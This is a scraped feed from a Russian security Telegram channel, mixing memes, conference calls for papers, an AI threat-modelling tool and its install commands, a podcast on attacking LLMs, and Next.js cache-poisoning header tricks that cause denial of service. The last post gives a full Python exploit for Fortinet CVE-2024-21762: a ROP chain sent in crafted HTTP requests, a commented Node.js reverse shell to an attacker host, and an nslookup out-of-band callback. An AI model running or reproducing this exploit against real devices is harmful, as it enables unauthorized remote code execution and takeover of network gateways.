Похек
17K subscribers
2.13K photos
111 videos
243 files
3.09K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Forwarded from Похек meme
Когда багхантишь на проде

@poxek_meme
😁482
Похек meme
Когда багхантишь на проде @poxek_meme
Кто-то продолжает ломать)))
😁283
Генерация модели угроз с помощью AI
#gpt #mistral #gemini #azure #threatmodeling

STRIDE GPT - это инструмент моделирования угроз на основе нейросетей, который использует большие языковые модели (LLM) для создания моделей угроз и деревьев атак для заданного приложения на основе методологии STRIDE. Пользователь дает нейросети данные о приложении, такие как тип приложения, методы аутентификации, а также информацию о том, работает ли приложение с Интернетом или обрабатывает конфиденциальные данные. Затем модель генерирует результаты на основе предоставленной информации.

➡️ Есть статья от VK "Руководство по моделированию угроз для разработчиков"

➡️ Доклад от разработка STRIDE GPT

🛠 Демо можете глянуть ТУТ

Веб-интерфейс поддерживает самые популярные LLM: OpenAI API, Google AI API, Microsoft Azure API, Mistral API. Также, вы можете загрузить диаграмму архитектуры вашего приложения ( у вас ведь есть визуализация архитектуры приложения?))
Можно генерировать:
➡️Модель угроз
➡️Дерево потенциальных атак
➡️Исправления, которые предлагает AI
➡️Модель оценки рисков по DREAD
➡️Пишет тест кейсы на Gherkin

Кому такая штука полезна?
➡️Руководители ИБ
➡️Разработчики
➡️Архитекторы ИТ/ИБ
➡️Аналитики ИБ

Установка:

Ручная установка
git clone https://github.com/mrwadams/stride-gpt.git; cd stride-gpt; python3 -m venv venv; source venv/bin/activate; pip install -r requirements.txt


Установка современного человека
docker pull mrwadams/stridegpt:latest


Запуск:

Ручной
streamlit run main.py

Переходите по URL, который написан в консоли

Нормальный
docker run -p 8501:8501 mrwadams/stridegpt

Переходите на http://localhost:8501
Выполните шаги в интерфейсе Streamlit, чтобы использовать STRIDE GPT

p.s. скоро выйдет новый выпуск подкаста с нейросетевым гостем

🌚 @poxek | 📹 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10
Митап «Пентестер, аппсекер, аналитик и заказчик заходят в бар…»

Кто тут?)
Ставьте 🕺

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
279😁4
Осталось всего несколько часов до закрытия Call Of Papers на Pentest Award.
Я уже подал :)
Жду ваших работ ;)

➡️ https://award.awillix.ru/

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
😁102
Forwarded from Just Security
This media is not supported in your browser
VIEW IN TELEGRAM
Друзья, в связи с тем, что за выходные нам поступило большое количество просьб о продлении срока приема заявок, мы решили отложить его до 14 июля. 🔛

Во многом это обусловлено долгим согласованием участников частичного раскрытия NDA. Тем, кому удалось вовремя отправить заявки, начислим дополнительный балл в попытке восстановить справедливость.

Сроки окончательные, и других переносов не будет, так как жюри нужно достаточно времени для прочтения всех работ. Намекаем, что наименьшая конкуренция сейчас в номинации «Ловись рыбка: за самый оригинальный фишинг или попытку засоциалить сотрудников», поэтому не стесняйтесь отправлять работы по этой теме, возможно именно вы победите.

Уже сейчас можно сказать, что качество работ выросло в сравнении с прошлым годом, а значит, мы еще больше приблизились к общей цели, с которой создавался Pentest award — развитие сообщества этичного хакинга. 

Не терпится увидеть вас на награждении!
https://award.awillix.ru/

@justsecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
8
ChatGPT 10 - будущий Скайнет ?! Артем Семенов - PWN AI
#подкаст #pwnai

❗️ Буду краток, вышел второй выпуск 🌚 Poxek Podcast 🕺

У него в гостях - Артем Семёнов, основатель PWN AI. PWN AI (пывнэйай) - это телеграм канал, в котором Вы познаете (нет нет - не буддизм), как можно применить ИИ в нашей нелёгкой работе безопасника, а также много почитать об угрозах и проблемах безопасности этого самого ИИ.

➡️Подкаст будет интересен
Специалистам по кибербезопасности
Владельцам бизнеса
Всем, кто хочет узнать больше о применении нейросетей, LLM и машинного обучения в работе и для собственных нужд

➡️В этом подкасте мы обсудили
Кибербезопасность: актуальные угрозы ИИ, ИИ в ИБ, ИБ в ИИ.
Red Team: как взламывают нейросети, LLM
Red Team: как нейросети и LLM взламывают сайты и IT инфраструктуру.
PWN AI: представление канала, чем славится и почему стоит подписаться :)
Исследования: Разработчики нейросетей понимают, как работает их же продукт?!

➡️ Ссылки
📹 YouTube
😻 Mave
🎵 Яндекс Подкаст
❤️ PWN AI

Обязательно смотрите до конца!

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥183😁2👾21
Forwarded from OFFZONE
This media is not supported in your browser
VIEW IN TELEGRAM
®️ Запускаем call for papers!

Пятый OFFZONE пройдет 22–23 августа в Москве, в Культурном центре ЗИЛ.

В этом году у нас еще больше зон для выступлений: добавились AI.Zone и Threat.Zone.
Ждем доклады на самые разные темы: open-source, применение AI/ML в кибербезопасности, уязвимости в парсерах, пентест Wi-Fi и не только. Не бойтесь предложить что-то свое :)

Спикеры, которые пройдут отбор, получат: бесплатные проходки на конфу и Speaker party, наш мерч, а также другие плюшки в зависимости от зоны.

Присылайте заявки на доклады до 12 июля. 

Узнать больше и подать заявку
Please open Telegram to view this post
VIEW IN TELEGRAM
13
Отравление кеша. Разбираемся с кешированием страниц и атаками на него
#webpentest

От­равле­ние кеша (cache poisoning) — это вид ата­ки, при котором ата­кующий вно­сит в кеш сис­темы некор­рек­тные дан­ные. Ког­да сис­тема пыта­ется их исполь­зовать, это при­водит к проб­лемам: от наруше­ния работы до ком­про­мета­ции дан­ных. В этой статье я покажу отравле­ние кеша на при­мере реаль­ной уяз­вимос­ти в движ­ке сай­та, а так­же раз­берем­ся c HTTP-заголов­ками, которые пре­пятс­тву­ют этой ата­ке.

🔓 Читать далее

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
133
Forwarded from SHADOW:Group
💀 Про Next.js и отравление кэша

1️⃣ При извлечении данных для страниц SSR (рендеринга на стороне сервера) добавление заголовка x-middleware-prefetch приводит к получению пустого объекта JSON {} в качестве ответа. При наличии CDN или системы кэширования этот пустой ответ потенциально может быть кэширован, в зависимости от конфигурации правил кэширования, что делает целевую страницу непрактичной, а ее содержимое недоступным и получается некая разновидность DOS'а через отравление кэша.

2️⃣ Использование React Component Server (RSC) и отправка заголовка Rsc: 1, может привести к отравлению кэша и вернет RSC React вместо исходного содержимого. Успешность также зависит от CDN и его правил кэширования.

3️⃣ При определенных условиях можно перезаписать код состояния через значение заголовка x-invoke-status, непосредственно указанного в запросе и вызвать/вернуть страницу ошибки. Как правило, CDN и системы кэширования настроены так, чтобы не кэшировать коды ошибок HTTP. Однако можно указать код 200 для согласования с правилами кэширования и эффективно “принудительно” кэшировать страницу с ошибкой.

Более подробно про каждый из способов, а также некоторые советы как нафармить денег при общении с триажерами доступны в оригинальном ресерче по ссылке.

#web #cache #dos
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
8😁3
Конкурс проходок на 🕐🕑🕒🕓🕔🕕🕖
#offzone2024 #конкурс

➡️Конкурс на 2 проходки на OFFZONE

➡️Условия: сделать самый оригинальный, смешной, не токсичный мем про OFFZONE
➡️Сроки: 2 недели с момента выхода поста
➡️Условия оценки: наибольшее кол-во положительных реакций на сообщении и если будет сложная борьба, то моё мнение и @fun9ral.


➡️ Условия участия: 1 мем = 1 сообщение с тегом #offzone2024
Условие обязательное, не будете следить, не будете участвовать.

Также у OFFZONE есть свой канал. Там и новости выходят о мероприятии, а также каждый год ребята крафтят крутые хардварные бейджы)

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13😁54👾1
Forwarded from Mobile AppSec World (Yury Shabalin)
Как построить процесс безопасной разработки и не сойти с ума

Всем привет!

Буквально через 10 минут пообщаемся с очень уважаемыми и умными людьми на тему процессов безопасной разработки!

Уверен, будет интересно)

Если интересно, подключайтесь!
Forwarded from Mobile AppSec World (Yury Shabalin)
Персональные данные и мобильные приложения, как они связаны?

Всем привет!

Я наконец выплыл из отпуска и возвращаюсь в рабочее русло 😄

И на повестке дня сегодня не что иное, как персональные данные и их утечки.
Меня очень давно интересовал этот вопрос, можно ли считать хранение или утечку ПДн через мобилку на самом деле утечкой, чем это может грозить и вообще, что же такое мобильное приложение с точки зрения нашего законодательства?

Я потратил достаточно много времени и экспертизой своих коллег чтобы разобраться в этом вопросе и вот результат - статья на Хабр.

Как мне кажется получилось достаточно неплохо, по крайней мере для себя я определился и с понятиями ПДн в мобилках и с определением приложений вообще в законах. Надеюсь, вам тоже это будет интересно. Особенно, учитывая, что сейчас на рассмотрении закон о введении оборотных штрафов для компаний, допустивших утечки.

Приятного чтения!

#habr #ПДн
🔥4👾3
Fortinet FortiOS & FortiProxy Unauthorized RCE CVE-2024-21762
#RCE #CVE #Fortinet #FortiOS #FortiProxy

CVE-2024-21762 представляет собой уязвимость записи за границы буфера (buffer overflow) в Fortinet FortiOS и FortiProxy. Эта уязвимость позволяет неавторизованному атакующему выполнять произвольный код с помощью специально сформированных HTTP-запросов.

➡️Атакуемые продукты:
- FortiOS
- FortiProxy

Эксплойт:
import socket
import time
import argparse


TARGET = 'xxxxxxxxxxxx' # Target IP
PORT = 443 # Target port, usually 443 for SSL VPN

def make_sock(target, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, port))
return sock

def send_payload(payload, target, port):
with make_sock(target, port) as ssock:
ssock.sendall(payload)

def main():
ssl_do_handshake_ptr = b"%60%ce%42%00%00%00%00%00"
getcwd_ptr = b"%70%62%2c%04%00%00%00%00"

pivot_1 = b"%52%f7%fd%00%00%00%00%00" # push rdi; pop rsp; ret;
pivot_2 = b"%ac%c9%ab%02%00%00%00%00" # add rsp, 0x2a0; pop rbx; pop r12; pop rbp; ret;

rop = b""
rop += b"%c6%e2%46%00%00%00%00%00" # push rdi; pop rax; ret;
rop += b"%19%6f%4d%01%00%00%00%00" # sub rax, 0x2c8; ret;
rop += b"%8e%b2%fe%01%00%00%00%00" # add rax, 0x10; ret;
rop += b"%63%db%ae%02%00%00%00%00" # pop rcx; ret;
rop += b"%00%00%00%00%00%00%00%00" # zero rcx
rop += b"%38%ad%98%02%00%00%00%00" # or rcx, rax; setne al; movzx eax, al; ret;

rop += b"%c6%52%86%02%00%00%00%00" # shl rax, 4; add rax, rdx; ret;
rop += b"%6e%d0%3f%01%00%00%00%00" # or rdx, rcx; ret; - rdx is zero so this is a copy
rop += b"%a4%df%98%02%00%00%00%00" # sub rdx, rax; mov rax, rdx; ret;

rop += b"%f5%2c%e6%00%00%00%00%00" # sub rax, 0x10; ret;
rop += b"%e4%e6%d7%01%00%00%00%00" # add rsi, rax; mov [rdi+8], rsi; ret;

rop += b"%10%1b%0a%01%00%00%00%00" # push rax; pop rdi; add eax, 0x5d5c415b; ret;
rop += b"%25%0f%8d%02%00%00%00%00" # pop r8; ret; 0x028d0f25
rop += b"%00%00%00%00%00%00%00%00" # r8

pivot_3 = b"%e0%3f%4d%02%00%00%00%00" # add rsp, 0xd90; pop rbx; pop r12; pop rbp; ret;

call_execl = b"%80%c1%43%00%00%00%00%00"

bin_node = b"/bin/node%00"
e_flag = b"-e%00"
## use this one for rev shell b'(function(){var net%3drequire("net"),cp%3drequire("child_process"),sh%3dcp.spawn("/bin/node",["-i"]);var client%3dnew net.Socket();client.connect(1337,"xxxxxxxxxxx",function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})();%00'
js_payload = b'(function(){var cp=require("child_process");cp.execSync("nslookup xxxxxxxxxxx.oastify.com");})();%00'

form_value = b""
form_value += b"B"*11 + bin_node + b"B"*6 + e_flag + b"B"*14 + js_payload
form_value += b"B"*438 + pivot_2 + getcwd_ptr
form_value += b"B"*32 + pivot_1
form_value += b"B"*168 + call_execl
form_value += b"B"*432 + ssl_do_handshake_ptr
form_value += b"B"*32 + rop + pivot_3
body = (b"B"*1808 + b"=" + form_value + b"&")*20

data = b"POST /remote/hostcheck_validate HTTP/1.1\r\n"
data += b"Host: " + TARGET.encode() + b"\r\n"
data += b"Content-Length: " + str(len(body)).encode() + b"\r\n"
data += b"\r\n"
data += body

send_payload(data, TARGET, PORT)

# Short delay to ensure the server processes the first request
time.sleep(2)

# Preparing and sending the second part of the exploit
data = b"POST / HTTP/1.1\r\n"
data += b"Host: " + TARGET.encode() + b"\r\n"
data += b"Transfer-Encoding: chunked\r\n"
data += b"\r\n"
data += b"0"*4137 + b"\0"
data += b"A"*1 + b"\r\n\r\n"

send_payload(data, TARGET, PORT)

if __name__ == "__main__":
main()


Подробные ресерчи можете найти ТУТ, ТУТ, ТУТ

Скрипт для проверки безопасности вашего сервера
https://github.com/BishopFox/cve-2024-21762-check

git clone https://github.com/BishopFox/cve-2024-21762-check; cd cve-2024-21762-check; python3 check-cve-2024-21762.py <host> <port>



🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
137👾3😁2